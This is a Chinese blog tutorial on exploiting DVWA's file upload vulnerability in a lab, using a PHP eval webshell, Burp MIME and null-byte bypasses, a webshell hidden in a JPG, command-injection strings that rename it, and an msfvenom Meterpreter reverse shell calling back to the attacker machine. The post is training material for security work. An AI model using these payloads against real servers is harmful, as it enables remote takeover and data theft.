dvwa中的文件上传漏洞

已于 2023-01-17 09:17:22 修改
阅读量7.9k 收藏 123
点赞数 17
分类专栏: 安全 文章标签: web安全 dvwa 文件上传漏洞 Powered by 金山文档
于 2023-01-12 14:28:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/128659049
版权

环境:

Metasploitable2: 192.168.11.157 dvwa版本:Version 1.0.7 (Release date: 08/09/10)

kail机器:192.168.11.156

一、什么是文件上传漏洞?

  1. 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等。正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回;

  1. 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网;

上传漏洞原理图:

文件上传漏洞,通常是由于对上传文件的类型、内容没进行严格的审查、过滤,使得攻击者可以通过上传木马获取服务器的webshell权限。

入侵条件:

  1. 木马上传成功

  1. 知道木马的路径

  1. 木马能够正常运行

二、演示dvwa上的文件上传漏洞

2.1、编辑一句话木马

pass.php文件添加 

<?php @eval($_POST['pass']);?>

  • @表示后面即使执行错误,也不报错。

  • eval()函数表示括号内的语句字符串什么的全都当做代码执行。

  • $_POST['pass']表示从页面中获得pass这个参数值。

2.2、低安全模式

low级别未对上传的文件进行任何验证,可以上传任意类型的文件

尝试上传木马文件php文件,成功:

直接打开木马文件http://192.168.11.157/dvwa/hackable/uploads/pass.php访问成功,但没有显示任何内容(因为是php文件)

通过中国蚁剑连接工具(或者中国菜刀)将url添加进去,密码为pass

打开文件管理,进入后台成功:

2.3、中安全模式

限制文件类型image/jpeg和大小不能超过100000B(约为97.6KB)

2.3.1、可以利用burpsuite绕过

上传木马文件pass.php,更改文件类型为image/jpeg

攻击后发现上传成功:

2.3.2、00截断

将木马文件pass.php改名为pass.php.jpeg,上传pass.php.jpeg,同时开启burpsuite捕获

切换到Hex进制,将pass.php.jpeg截断为pass.php:

点击“forward”, 也可将pass.php成功上传:

2.4、高安全模式

文件后缀限制与大小限制

下面介绍几种绕过的方法。

2.4.1、将木马隐藏在图片中绕过(High文件上传+Low命令注入)

1、将木马文件pass.php与图片文件test.jpg合并为php.jpg

windows上(关闭实时防护)使用copy命令: copy test.jpg/b+pass.php/a php.jpg

linux上:cat pass.php >> test.jpg

可以看到,一句话木马被添加到图片的尾部(记事本查看或者cat php.jpg):

2、将php.jpg文件上传,成功:

3、选择命令注入(Command Execution):

调整dvwa的等级为low,在Command Execution中输入 127.0.0.1|ls ../../hackable/uploads

结果如下:

4、然后通过命令注入方式输入以下命令来进行更改文件后缀

127.0.0.1|mv ../../hackable/uploads/php.jpg ../../hackable/uploads/php.php

再执行127.0.0.1|ls ../../hackable/uploads查看:

5、中国蚁剑查看,指定连接目录http://192.168.11.157/dvwa/hackable/uploads/php.php,参数为cmd,类型为PHP(eval):

2.4.2、用msfvenom生成的php代码的图片木马,图片欺诈头部绕过(High文件上传+Low文件包含)

1、首先用msfvenom生成一个PHP语言的IPG图片木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.156 lport=3333 >> /root/Desktop/any.jpg

2、上传图片木马any.png

3、在kali终端输入msfconsole进入控制台,输入如下指令

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.11.156
set lport 3333
run

4、dvwa选择low等级,切换到文件包含File Inclusion

5、在地址栏输入以下的地址并回车

http://192.168.11.157/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/any.jpg

6、msfconsole控制台就有生成一条会话

7、然后我们通过命令查看一下/hackable/uploads这个目录下有什么文件,然后测试随便删除一个文件,看看有没有权限,测试成功

三、参考

DVWA1.9之文件上传漏洞High级多种方法_晚安這個未知的世界的博客-CSDN博客_dvwa文件上传high级别

VMware之kali安装中国蚁剑_小豆饼的博客-CSDN博客_kali安装中国蚁剑

青霄
关注
  • 17
    点赞
  • 123
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场-文件上传漏洞~保姆级教程!!!
2301_77360738的博客
05-14 648
全网最最最最最详细的dvwa靶场File Upload文件上传漏洞,看完必会,小白可入!!!
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 1623
当然了,代码还有很多种写法,这只是比较简单的一种,一些特殊情况下还要使用别的写法。
利用DVWA演示文件上传漏洞获取网站shell权限(High级别)
最新发布
weixin_43822401的博客
06-13 589
文件上传漏洞是网络安全常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件到服务器上,从而获得对网站的远程控制权限。本文将以DVWA (Damn Vulnerable Web Application) 为例,演示如何利用文件上传漏洞的High级别设置,绕过文件类型和内容限制,获得网站的shell权限。
dvwa——任意文件上传漏洞
GZY0601的博客
09-18 263
ok,前面把sql注入两个关卡最基本的通关方法给学了,这个文章我们来学任意文件上传漏洞,废话不多说,现在就开始!文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。其实今天应该先写的文件包含漏洞的,然后来讲文件上传的high会好点的,但是忘记了先写了,写到high才想起来,有点裂开,我们明天就来写文件包含漏洞吧。哈哈哈哈哈哈哈!好啦,以上内容为我个人理解,不喜勿喷,如有写错欢迎指出!
DVWA靶场-文件上传漏洞
热门推荐
zeroone的博客
03-08 1万+
第五关:File upload(文件上传)       文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 Low <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to
DVWA文件上传漏洞
m0_61851859的博客
02-05 350
(1)通过$_FILES预定义变量获取上传文件的文件名(name)、文件类型(type)和文件大小(size)这是三个数据分别赋给三个变量$uploaded_name、$uploaded_type、$uploaded_size。(3)因此,medium级别主要是判断文件的类别和大小,代码对于文件大小的限制一般文件都可以满足要求,因此主要分析文件上传的类型。(8)综上,low级别对上传的文件类型没有任何防范,其初衷是想要用户只能上传图片,而现在可以上传php文件,而且能够被网站解析。
文件上传DVWA文件上传攻略
wj33333的博客
11-17 451
通过源码分析我们可以看到,他对上传的文件类型进行过滤,只允许image/jpeg和image/png文件上传,否则不成功,但是他没有审核内容,所以我们使用图片木马轻松绕过,配合国蚁剑拿到权限.我们通过源码可以看到对于文件上传没有做任何过滤,允许所有文件进行上传.所有我们使用一句话木马,配合国蚁剑就能成功拿到权限.我们要修改图片后缀为php,(因为要和国蚁连接)放包.但是我们已经将木马图片上传成功,所以尝试使用文件包含。或者上传图片抓包.将一句话木马写到图片后面。上传图片木马成功了.
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
文件上传漏洞Web 应用程序的一种常见漏洞,攻击者可以通过上传恶意文件来获取服务器的控制权。本文将详细介绍文件上传漏洞的原理、实验步骤和防御方法。 一、文件上传漏洞原理 文件上传漏洞是由于 Web 应用...
计算机病毒与防护:文件上传漏洞原理.ppt
06-10
文件上传漏洞是网络安全领域的一个重要问题,尤其是在Web应用程序,这种漏洞可能导致严重的安全威胁。许多网站提供文件上传功能,例如用户上传头像、社交网络上的照片分享、服务网站的证明材料提交以及电商网站...
web安全技术-实验六、文件上传漏洞.doc
08-20
文件上传漏洞】是Web应用安全领域的一个重要概念,它主要出现在允许用户上传文件到服务器的应用程序。当系统没有正确地验证或过滤上传的文件类型时,攻击者可以利用这个漏洞上传恶意代码,例如病毒、木马或者...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
在实验,我们使用了 DVWA 安全测试平台,搭建了一个有文件上传漏洞的网站,使用国菜刀工具获取了网站的 webshell,进而获取了网站和所在服务器的相关数据。 在防御文件包含漏洞时,务必要禁用文件包含功能,...
PHP、Apache环境部署DVWA(综合靶场)
01-08
DVWA(Damn Vulnerable Web Application)是一款专门为安全研究人员和Web开发者设计的开源靶场工具,它包含了多种常见的Web应用漏洞,如密码爆破、SQL注入、文件上传、文件包含、跨站脚本(XSS)和跨站请求伪造...
DVWA文件上传漏洞
编程界菜姬的博客
06-04 1678
文件上传漏洞是指用户上传可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。 上传漏洞原因在于代码作者没有对访客提交的数据进行校验或者过滤不严格,使上传的文件可以是木马、病毒、恶意脚本等等。
DVWA文件上传漏洞(upload)
kirito_pio的博客
06-04 1667
目录 1、low级别(直接上传) 1.1 上传文件 1.2验证 2、medium级别(使用Burp Suite进行代理) 2.1 进行代理配置 2.2 文件上传 2.3 验证 3、high级别(进行文件合并) 3.1 文件创建 3.2上传及验证 1、low级别(直接上传) <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable..
dvwa靶场文件上传high
W286734的博客
01-25 1605
合成图片码的方法此链接的最下面的部分上传图片码尝试连接这里因为图片为png格式无法解析但是有的图片码是可以直接解析。此时我们可以利用dvwa的文件包含low那一关尝试,因为在文件包含漏洞会把不是php格式的文件也按照php文件解析。
农夫安全学习——文件上传漏洞
qq_52263650的博客
03-25 330
由于程序员在对用户文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。
dvwa上传php文件,DVWA系列(四)——文件上传漏洞
weixin_39720003的博客
03-18 214
今天笔者将为大家带来DVWA系列的第四篇文章,主要讲述文件上传漏洞相关内容,先来看一看什么是文件上传漏洞文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。 这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。在平常的CTF比赛以及实际的渗透测试,漏洞挖掘过程,通过文件上传漏洞getshell是最直...
DVWA-文件上传全等级绕过(一句话木马+国菜刀+蚁剑)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 1万+
DVWA文件上传前言一、low级别1.1 一句话木马1.2 国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传一些木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 一、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
dvwa文件上传高级别
05-07
DVWA(Damn Vulnerable Web Application)是一个用于演示网络安全漏洞Web应用程序,包含了许多常见的Web漏洞,例如SQL注入、XSS、CSRF等。其包含了一个文件上传功能,通过上传恶意文件可以进行任意代码执行等攻击。 在DVWA文件上传,高级别漏洞常常涉及到以下几个方面: 1. 文件类型检查不严格。一些文件类型的检查不严格,比如只检查了文件后缀名而没有检查文件的真实类型,就可以通过将恶意脚本改为符合允许上传文件格式的文件类型进行上传。 2. 文件名绕过。一些文件名过滤的实现方式不严谨,比如只对一些特定字符进行过滤,攻击者可以通过构造特殊的文件名绕过过滤机制。 3. 文件内容篡改。在上传文件的过程,攻击者可以通过篡改文件内容来执行任意代码。比如在图片文件嵌入恶意脚本,当用户访问该图片时就会执行该脚本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值